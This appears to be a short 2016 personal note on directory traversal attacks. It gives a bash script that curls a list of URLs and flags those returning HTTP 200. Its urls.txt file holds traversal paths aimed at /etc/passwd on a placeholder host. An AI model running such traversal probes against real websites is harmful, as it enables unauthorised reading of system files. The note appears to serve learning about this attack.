/other/

#note 13.11.2016 Directory Traversal Attacks

2016-11-13 18:53:50

-https://www.youtube.com/watch?v=uW1jUxOrHkc

dt.sh

#!/usr/bin/env bash

echo '----------- Directory Traversal -----------'

URL_FILE=urls.txt

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
NC='\033[0m'

while read url;
    do
        statusCode=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n'  "${url}")
        if [ "$statusCode" == 200 ]
            then
                echo -e ${RED} 'StatusCode: ' ${statusCode} '[ yep we have something ]' ${url} ${NC}
            else
            if [ "$statusCode" == 404 ]
                then
                    echo -e ${GREEN} 'StatusCode: ' ${statusCode} '[ it seems that resource does`t exist ]' ${url} ${NC}
            else
                echo -e  ${YELLOW} 'StatusCode: ' ${statusCode} '[ some crazy shit, check this ]' ${url} ${NC}
            fi
            fi
done < ${URL_FILE}

urls.txt

http://www.example_page.pl/doc/
http://www.example_page.pl/js/
http://www.example_page.pl/css/
http://www.example_page.pl/etc/passwd/
http://www.example_page.pl/../etc/passwd/
http://www.example_page.pl/../../etc/passwd/
http://www.example_page.pl/../../../etc/passwd/
http://www.example_page.pl/../../../../etc/passwd/